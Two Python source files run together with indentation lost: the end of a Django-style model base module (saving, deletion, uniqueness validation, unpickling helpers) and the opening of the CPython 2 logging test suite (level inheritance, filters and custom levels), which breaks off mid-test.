Creates some methods once self._meta has been populated.
"""
opts = cls._meta
opts._prepare(cls)
if opts.order_with_respect_to:
cls.get_next_in_order = curry(cls._get_next_or_previous_in_order, is_next=True)
cls.get_previous_in_order = curry(cls._get_next_or_previous_in_order, is_next=False)
# defer creating accessors on the foreign class until we are
# certain it has been created
def make_foreign_order_accessors(field, model, cls):
setattr(
field.rel.to,
'get_%s_order' % cls.__name__.lower(),
curry(method_get_order, cls)
)
setattr(
field.rel.to,
'set_%s_order' % cls.__name__.lower(),
curry(method_set_order, cls)
)
add_lazy_relation(
cls,
opts.order_with_respect_to,
opts.order_with_respect_to.rel.to,
make_foreign_order_accessors
)
# Give the class a docstring -- its definition.
if cls.__doc__ is None:
cls.__doc__ = "%s(%s)" % (cls.__name__, ", ".join([f.attname for f in opts.fields]))
if hasattr(cls, 'get_absolute_url'):
cls.get_absolute_url = update_wrapper(curry(get_absolute_url, opts, cls.get_absolute_url),
cls.get_absolute_url)
signals.class_prepared.send(sender=cls)
class ModelState(object):
"""
A class for storing instance state
"""
def __init__(self, db=None):
self.db = db
# If true, uniqueness validation checks will consider this a new, as-yet-unsaved object.
# Necessary for correct validation of new instances of objects with explicit (non-auto) PKs.
# This impacts validation only; it has no effect on the actual save.
self.adding = True
class Model(object):
__metaclass__ = ModelBase
_deferred = False
def __init__(self, *args, **kwargs):
self._entity_exists = kwargs.pop('__entity_exists', False)
signals.pre_init.send(sender=self.__class__, args=args, kwargs=kwargs)
# Set up the storage for instance state
self._state = ModelState()
# There is a rather weird disparity here; if kwargs, it's set, then args
# overrides it. It should be one or the other; don't duplicate the work
# The reason for the kwargs check is that standard iterator passes in by
# args, and instantiation for iteration is 33% faster.
args_len = len(args)
if args_len > len(self._meta.fields):
# Daft, but matches old exception sans the err msg.
raise IndexError("Number of args exceeds number of fields")
fields_iter = iter(self._meta.fields)
if not kwargs:
# The ordering of the izip calls matter - izip throws StopIteration
# when an iter throws it. So if the first iter throws it, the second
# is *not* consumed. We rely on this, so don't change the order
# without changing the logic.
for val, field in izip(args, fields_iter):
setattr(self, field.attname, val)
else:
# Slower, kwargs-ready version.
for val, field in izip(args, fields_iter):
setattr(self, field.attname, val)
kwargs.pop(field.name, None)
# Maintain compatibility with existing calls.
if isinstance(field.rel, ManyToOneRel):
kwargs.pop(field.attname, None)
# Now we're left with the unprocessed fields that *must* come from
# keywords, or default.
for field in fields_iter:
is_related_object = False
# This slightly odd construct is so that we can access any
# data-descriptor object (DeferredAttribute) without triggering its
# __get__ method.
if (field.attname not in kwargs and
isinstance(self.__class__.__dict__.get(field.attname), DeferredAttribute)):
# This field will be populated on request.
continue
if kwargs:
if isinstance(field.rel, ManyToOneRel):
try:
# Assume object instance was passed in.
rel_obj = kwargs.pop(field.name)
is_related_object = True
except KeyError:
try:
# Object instance wasn't passed in -- must be an ID.
val = kwargs.pop(field.attname)
except KeyError:
val = field.get_default()
else:
# Object instance was passed in. Special case: You can
# pass in "None" for related objects if it's allowed.
if rel_obj is None and field.null:
val = None
else:
try:
val = kwargs.pop(field.attname)
except KeyError:
# This is done with an exception rather than the
# default argument on pop because we don't want
# get_default() to be evaluated, and then not used.
# Refs #12057.
val = field.get_default()
else:
val = field.get_default()
if is_related_object:
# If we are passed a related instance, set it using the
# field.name instead of field.attname (e.g. "user" instead of
# "user_id") so that the object gets properly cached (and type
# checked) by the RelatedObjectDescriptor.
setattr(self, field.name, rel_obj)
else:
setattr(self, field.attname, val)
if kwargs:
for prop in kwargs.keys():
try:
if isinstance(getattr(self.__class__, prop), property):
setattr(self, prop, kwargs.pop(prop))
except AttributeError:
pass
if kwargs:
raise TypeError("'%s' is an invalid keyword argument for this function" % kwargs.keys()[0])
self._original_pk = self.pk if self._meta.pk is not None else None
super(Model, self).__init__()
signals.post_init.send(sender=self.__class__, instance=self)
def __repr__(self):
try:
u = unicode(self)
except (UnicodeEncodeError, UnicodeDecodeError):
u = '[Bad Unicode data]'
return smart_str(u'<%s: %s>' % (self.__class__.__name__, u))
def __str__(self):
if hasattr(self, '__unicode__'):
return force_unicode(self).encode('utf-8')
return '%s object' % self.__class__.__name__
def __eq__(self, other):
return isinstance(other, self.__class__) and self._get_pk_val() == other._get_pk_val()
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self._get_pk_val())
def __reduce__(self):
"""
Provide pickling support. Normally, this just dispatches to Python's
standard handling. However, for models with deferred field loading, we
need to do things manually, as they're dynamically created classes and
only module-level classes can be pickled by the default path.
"""
data = self.__dict__
model = self.__class__
# The obvious thing to do here is to invoke super().__reduce__()
# for the non-deferred case. Don't do that.
# On Python 2.4, there is something weird with __reduce__,
# and as a result, the super call will cause an infinite recursion.
# See #10547 and #12121.
defers = []
pk_val = None
if self._deferred:
from django.db.models.query_utils import deferred_class_factory
factory = deferred_class_factory
for field in self._meta.fields:
if isinstance(self.__class__.__dict__.get(field.attname),
DeferredAttribute):
defers.append(field.attname)
if pk_val is None:
# The pk_val and model values are the same for all
# DeferredAttribute classes, so we only need to do this
# once.
obj = self.__class__.__dict__[field.attname]
model = obj.model_ref()
else:
factory = simple_class_factory
return (model_unpickle, (model, defers, factory), data)
def _get_pk_val(self, meta=None):
if not meta:
meta = self._meta
return getattr(self, meta.pk.attname)
def _set_pk_val(self, value):
return setattr(self, self._meta.pk.attname, value)
pk = property(_get_pk_val, _set_pk_val)
def serializable_value(self, field_name):
"""
Returns the value of the field name for this instance. If the field is
a foreign key, returns the id value, instead of the object. If there's
no Field object with this name on the model, the model attribute's
value is returned directly.
Used to serialize a field's value (in the serializer, or form output,
for example). Normally, you would just access the attribute directly
and not use this method.
"""
try:
field = self._meta.get_field_by_name(field_name)[0]
except FieldDoesNotExist:
return getattr(self, field_name)
return getattr(self, field.attname)
def save(self, force_insert=False, force_update=False, using=None):
"""
Saves the current instance. Override this in a subclass if you want to
control the saving process.
The 'force_insert' and 'force_update' parameters can be used to insist
that the "save" must be an SQL insert or update (or equivalent for
non-SQL backends), respectively. Normally, they should not be set.
"""
if force_insert and force_update:
raise ValueError("Cannot force both insert and updating in model saving.")
self.save_base(using=using, force_insert=force_insert, force_update=force_update)
save.alters_data = True
def save_base(self, raw=False, cls=None, origin=None, force_insert=False,
force_update=False, using=None):
"""
Does the heavy-lifting involved in saving. Subclasses shouldn't need to
override this method. It's separate from save() in order to hide the
need for overrides of save() to pass around internal-only parameters
('raw', 'cls', and 'origin').
"""
using = using or router.db_for_write(self.__class__, instance=self)
entity_exists = bool(self._entity_exists and self._original_pk == self.pk)
connection = connections[using]
assert not (force_insert and force_update)
if cls is None:
cls = self.__class__
meta = cls._meta
if not meta.proxy:
origin = cls
else:
meta = cls._meta
if origin and not meta.auto_created:
signals.pre_save.send(sender=origin, instance=self, raw=raw, using=using)
# If we are in a raw save, save the object exactly as presented.
# That means that we don't try to be smart about saving attributes
# that might have come from the parent class - we just save the
# attributes we have been given to the class we have been given.
# We also go through this process to defer the save of proxy objects
# to their actual underlying model.
if not raw or meta.proxy:
if meta.proxy:
org = cls
else:
org = None
for parent, field in meta.parents.items():
# At this point, parent's primary key field may be unknown
# (for example, from administration form which doesn't fill
# this field). If so, fill it.
if field and getattr(self, parent._meta.pk.attname) is None and getattr(self, field.attname) is not None:
setattr(self, parent._meta.pk.attname, getattr(self, field.attname))
self.save_base(cls=parent, origin=org, using=using)
if field:
setattr(self, field.attname, self._get_pk_val(parent._meta))
if meta.proxy:
return
if not meta.proxy:
non_pks = [f for f in meta.local_fields if not f.primary_key]
# First, try an UPDATE. If that doesn't update anything, do an INSERT.
pk_val = self._get_pk_val(meta)
pk_set = pk_val is not None
record_exists = True
manager = cls._base_manager
# TODO/NONREL: Some backends could emulate force_insert/_update
# with an optimistic transaction, but since it's costly we should
# only do it when the user explicitly wants it.
# By adding support for an optimistic locking transaction
# in Django (SQL: SELECT ... FOR UPDATE) we could even make that
# part fully reusable on all backends (the current .exists()
# check below isn't really safe if you have lots of concurrent
# requests. BTW, and neither is QuerySet.get_or_create).
try_update = connection.features.distinguishes_insert_from_update
if not try_update:
record_exists = False
if try_update and pk_set:
# Determine whether a record with the primary key already exists.
if (force_update or (not force_insert and
manager.using(using).filter(pk=pk_val).exists())):
# It does already exist, so do an UPDATE.
if force_update or non_pks:
values = [(f, None, (raw and getattr(self, f.attname) or f.pre_save(self, False))) for f in non_pks]
rows = manager.using(using).filter(pk=pk_val)._update(values)
if force_update and not rows:
raise DatabaseError("Forced update did not affect any rows.")
else:
record_exists = False
if not pk_set or not record_exists:
if meta.order_with_respect_to:
# If this is a model with an order_with_respect_to
# autopopulate the _order field
field = meta.order_with_respect_to
order_value = manager.using(using).filter(**{field.name: getattr(self, field.attname)}).count()
self._order = order_value
if connection.features.distinguishes_insert_from_update:
add = True
else:
add = not entity_exists
if not pk_set:
if force_update:
raise ValueError("Cannot force an update in save() with no primary key.")
values = [(f, f.get_db_prep_save(raw and getattr(self, f.attname) or f.pre_save(self, add), connection=connection))
for f in meta.local_fields if not isinstance(f, AutoField)]
else:
values = [(f, f.get_db_prep_save(raw and getattr(self, f.attname) or f.pre_save(self, add), connection=connection))
for f in meta.local_fields]
record_exists = False
update_pk = bool(meta.has_auto_field and not pk_set)
if values:
# Create a new record.
result = manager._insert(values, return_id=update_pk, using=using)
else:
# Create a new record with defaults for everything.
result = manager._insert([(meta.pk, connection.ops.pk_default_value())], return_id=update_pk, raw_values=True, using=using)
if update_pk:
setattr(self, meta.pk.attname, result)
transaction.commit_unless_managed(using=using)
# Store the database on which the object was saved
self._state.db = using
# Once saved, this is no longer a to-be-added instance.
self._state.adding = False
# Signal that the save is complete
if origin and not meta.auto_created:
if connection.features.distinguishes_insert_from_update:
created = not record_exists
else:
created = not entity_exists
signals.post_save.send(sender=origin, instance=self,
created=created, raw=raw, using=using)
self._entity_exists = True
self._original_pk = self.pk
save_base.alters_data = True
def delete(self, using=None):
using = using or router.db_for_write(self.__class__, instance=self)
assert self._get_pk_val() is not None, "%s object can't be deleted because its %s attribute is set to None." % (self._meta.object_name, self._meta.pk.attname)
collector = Collector(using=using)
collector.collect([self])
collector.delete()
self._entity_exists = False
self._original_pk = None
delete.alters_data = True
def _get_FIELD_display(self, field):
value = getattr(self, field.attname)
return force_unicode(dict(field.flatchoices).get(value, value), strings_only=True)
def _get_next_or_previous_by_FIELD(self, field, is_next, **kwargs):
if not self.pk:
raise ValueError("get_next/get_previous cannot be used on unsaved objects.")
op = is_next and 'gt' or 'lt'
order = not is_next and '-' or ''
param = smart_str(getattr(self, field.attname))
q = Q(**{'%s__%s' % (field.name, op): param})
q = q|Q(**{field.name: param, 'pk__%s' % op: self.pk})
qs = self.__class__._default_manager.using(self._state.db).filter(**kwargs).filter(q).order_by('%s%s' % (order, field.name), '%spk' % order)
try:
return qs[0]
except IndexError:
raise self.DoesNotExist("%s matching query does not exist." % self.__class__._meta.object_name)
def _get_next_or_previous_in_order(self, is_next):
cachename = "__%s_order_cache" % is_next
if not hasattr(self, cachename):
op = is_next and 'gt' or 'lt'
order = not is_next and '-_order' or '_order'
order_field = self._meta.order_with_respect_to
obj = self._default_manager.filter(**{
order_field.name: getattr(self, order_field.attname)
}).filter(**{
'_order__%s' % op: self._default_manager.values('_order').filter(**{
self._meta.pk.name: self.pk
})
}).order_by(order)[:1].get()
setattr(self, cachename, obj)
return getattr(self, cachename)
def prepare_database_save(self, unused):
return self.pk
def clean(self):
"""
Hook for doing any extra model-wide validation after clean() has been
called on every field by self.clean_fields. Any ValidationError raised
by this method will not be associated with a particular field; it will
have a special-case association with the field defined by NON_FIELD_ERRORS.
"""
pass
def validate_unique(self, exclude=None):
"""
Checks unique constraints on the model and raises ``ValidationError``
if any failed.
"""
unique_checks, date_checks = self._get_unique_checks(exclude=exclude)
errors = self._perform_unique_checks(unique_checks)
date_errors = self._perform_date_checks(date_checks)
for k, v in date_errors.items():
errors.setdefault(k, []).extend(v)
if errors:
raise ValidationError(errors)
def _get_unique_checks(self, exclude=None):
"""
Gather a list of checks to perform. Since validate_unique could be
called from a ModelForm, some fields may have been excluded; we can't
perform a unique check on a model that is missing fields involved
in that check.
Fields that did not validate should also be excluded, but they need
to be passed in via the exclude argument.
"""
if exclude is None:
exclude = []
unique_checks = []
unique_togethers = [(self.__class__, self._meta.unique_together)]
for parent_class in self._meta.parents.keys():
if parent_class._meta.unique_together:
unique_togethers.append((parent_class, parent_class._meta.unique_together))
for model_class, unique_together in unique_togethers:
for check in unique_together:
for name in check:
# If this is an excluded field, don't add this check.
if name in exclude:
break
else:
unique_checks.append((model_class, tuple(check)))
# These are checks for the unique_for_<date/year/month>.
date_checks = []
# Gather a list of checks for fields declared as unique and add them to
# the list of checks.
fields_with_class = [(self.__class__, self._meta.local_fields)]
for parent_class in self._meta.parents.keys():
fields_with_class.append((parent_class, parent_class._meta.local_fields))
for model_class, fields in fields_with_class:
for f in fields:
name = f.name
if name in exclude:
continue
if f.unique:
unique_checks.append((model_class, (name,)))
if f.unique_for_date and f.unique_for_date not in exclude:
date_checks.append((model_class, 'date', name, f.unique_for_date))
if f.unique_for_year and f.unique_for_year not in exclude:
date_checks.append((model_class, 'year', name, f.unique_for_year))
if f.unique_for_month and f.unique_for_month not in exclude:
date_checks.append((model_class, 'month', name, f.unique_for_month))
return unique_checks, date_checks
def _perform_unique_checks(self, unique_checks):
errors = {}
for model_class, unique_check in unique_checks:
# Try to look up an existing object with the same values as this
# object's values for all the unique field.
lookup_kwargs = {}
for field_name in unique_check:
f = self._meta.get_field(field_name)
lookup_value = getattr(self, f.attname)
if lookup_value is None:
# no value, skip the lookup
continue
if f.primary_key and not self._state.adding:
# no need to check for unique primary key when editing
continue
lookup_kwargs[str(field_name)] = lookup_value
# some fields were skipped, no reason to do the check
if len(unique_check) != len(lookup_kwargs.keys()):
continue
qs = model_class._default_manager.filter(**lookup_kwargs)
# Exclude the current object from the query if we are editing an
# instance (as opposed to creating a new one)
if not self._state.adding and self.pk is not None:
qs = qs.exclude(pk=self.pk)
if qs.exists():
if len(unique_check) == 1:
key = unique_check[0]
else:
key = NON_FIELD_ERRORS
errors.setdefault(key, []).append(self.unique_error_message(model_class, unique_check))
return errors
def _perform_date_checks(self, date_checks):
errors = {}
for model_class, lookup_type, field, unique_for in date_checks:
lookup_kwargs = {}
# there's a ticket to add a date lookup, we can remove this special
# case if that makes it's way in
date = getattr(self, unique_for)
if date is None:
continue
if lookup_type == 'date':
lookup_kwargs['%s__day' % unique_for] = date.day
lookup_kwargs['%s__month' % unique_for] = date.month
lookup_kwargs['%s__year' % unique_for] = date.year
else:
lookup_kwargs['%s__%s' % (unique_for, lookup_type)] = getattr(date, lookup_type)
lookup_kwargs[field] = getattr(self, field)
qs = model_class._default_manager.filter(**lookup_kwargs)
# Exclude the current object from the query if we are editing an
# instance (as opposed to creating a new one)
if not self._state.adding and self.pk is not None:
qs = qs.exclude(pk=self.pk)
if qs.exists():
errors.setdefault(field, []).append(
self.date_error_message(lookup_type, field, unique_for)
)
return errors
def date_error_message(self, lookup_type, field, unique_for):
opts = self._meta
return _(u"%(field_name)s must be unique for %(date_field)s %(lookup)s.") % {
'field_name': unicode(capfirst(opts.get_field(field).verbose_name)),
'date_field': unicode(capfirst(opts.get_field(unique_for).verbose_name)),
'lookup': lookup_type,
}
def unique_error_message(self, model_class, unique_check):
opts = model_class._meta
model_name = capfirst(opts.verbose_name)
# A unique field
if len(unique_check) == 1:
field_name = unique_check[0]
field_label = capfirst(opts.get_field(field_name).verbose_name)
# Insert the error into the error dict, very sneaky
return _(u"%(model_name)s with this %(field_label)s already exists.") % {
'model_name': unicode(model_name),
'field_label': unicode(field_label)
}
# unique_together
else:
field_labels = map(lambda f: capfirst(opts.get_field(f).verbose_name), unique_check)
field_labels = get_text_list(field_labels, _('and'))
return _(u"%(model_name)s with this %(field_label)s already exists.") % {
'model_name': unicode(model_name),
'field_label': unicode(field_labels)
}
def full_clean(self, exclude=None):
"""
Calls clean_fields, clean, and validate_unique, on the model,
and raises a ``ValidationError`` for any errors that occured.
"""
errors = {}
if exclude is None:
exclude = []
try:
self.clean_fields(exclude=exclude)
except ValidationError, e:
errors = e.update_error_dict(errors)
# Form.clean() is run even if other validation fails, so do the
# same with Model.clean() for consistency.
try:
self.clean()
except ValidationError, e:
errors = e.update_error_dict(errors)
# Run unique checks, but only for fields that passed validation.
for name in errors.keys():
if name != NON_FIELD_ERRORS and name not in exclude:
exclude.append(name)
try:
self.validate_unique(exclude=exclude)
except ValidationError, e:
errors = e.update_error_dict(errors)
if errors:
raise ValidationError(errors)
def clean_fields(self, exclude=None):
"""
Cleans all fields and raises a ValidationError containing message_dict
of all validation errors if any occur.
"""
if exclude is None:
exclude = []
errors = {}
for f in self._meta.fields:
if f.name in exclude:
continue
# Skip validation for empty fields with blank=True. The developer
# is responsible for making sure they have a valid value.
raw_value = getattr(self, f.attname)
if f.blank and raw_value in validators.EMPTY_VALUES:
continue
try:
setattr(self, f.attname, f.clean(raw_value, self))
except ValidationError, e:
errors[f.name] = e.messages
if errors:
raise ValidationError(errors)
############################################
# HELPER FUNCTIONS (CURRIED MODEL METHODS) #
############################################
# ORDERING METHODS #########################
def method_set_order(ordered_obj, self, id_list, using=None):
if using is None:
using = DEFAULT_DB_ALIAS
rel_val = getattr(self, ordered_obj._meta.order_with_respect_to.rel.field_name)
order_name = ordered_obj._meta.order_with_respect_to.name
# FIXME: It would be nice if there was an "update many" version of update
# for situations like this.
for i, j in enumerate(id_list):
ordered_obj.objects.filter(**{'pk': j, order_name: rel_val}).update(_order=i)
transaction.commit_unless_managed(using=using)
def method_get_order(ordered_obj, self):
rel_val = getattr(self, ordered_obj._meta.order_with_respect_to.rel.field_name)
order_name = ordered_obj._meta.order_with_respect_to.name
pk_name = ordered_obj._meta.pk.name
return [r[pk_name] for r in
ordered_obj.objects.filter(**{order_name: rel_val}).values(pk_name)]
##############################################
# HELPER FUNCTIONS (CURRIED MODEL FUNCTIONS) #
##############################################
def get_absolute_url(opts, func, self, *args, **kwargs):
return settings.ABSOLUTE_URL_OVERRIDES.get('%s.%s' % (opts.app_label, opts.module_name), func)(self, *args, **kwargs)
########
# MISC #
########
class Empty(object):
pass
def simple_class_factory(model, attrs):
"""Used to unpickle Models without deferred fields.
We need to do this the hard way, rather than just using
the default __reduce__ implementation, because of a
__deepcopy__ problem in Python 2.4
"""
return model
def model_unpickle(model, attrs, factory):
"""
Used to unpickle Model subclasses with deferred fields.
"""
cls = factory(model, attrs)
return cls.__new__(cls)
model_unpickle.__safe_for_unpickle__ = True
if sys.version_info < (2, 5):
# Prior to Python 2.5, Exception was an old-style class
def subclass_exception(name, parents, unused):
return types.ClassType(name, parents, {})
else:
def subclass_exception(name, parents, module):
return type(name, parents, {'__module__': module})
|
|
#!/usr/bin/env python
#
# Copyright 2001-2012 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2012 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import cPickle
import cStringIO
import gc
import json
import os
import random
import re
import select
import socket
from SocketServer import ThreadingTCPServer, StreamRequestHandler
import struct
import sys
import tempfile
from test.test_support import captured_stdout, run_with_locale, run_unittest
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
except ImportError:
threading = None
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
finally:
logging._releaseLock()
# Set two unused loggers: one non-ASCII and one Unicode.
# This is to test correct operation when sorting existing
# loggers in the configuration code. See issue 8201.
logging.getLogger("\xab\xd7\xbb")
logging.getLogger(u"\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = cStringIO.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
self.root_logger.addHandler(self.root_hdlr)
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# StringIO.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warn (m())
DEB.info (m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_invalid_name(self):
self.assertRaises(TypeError, logging.getLogger, any)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
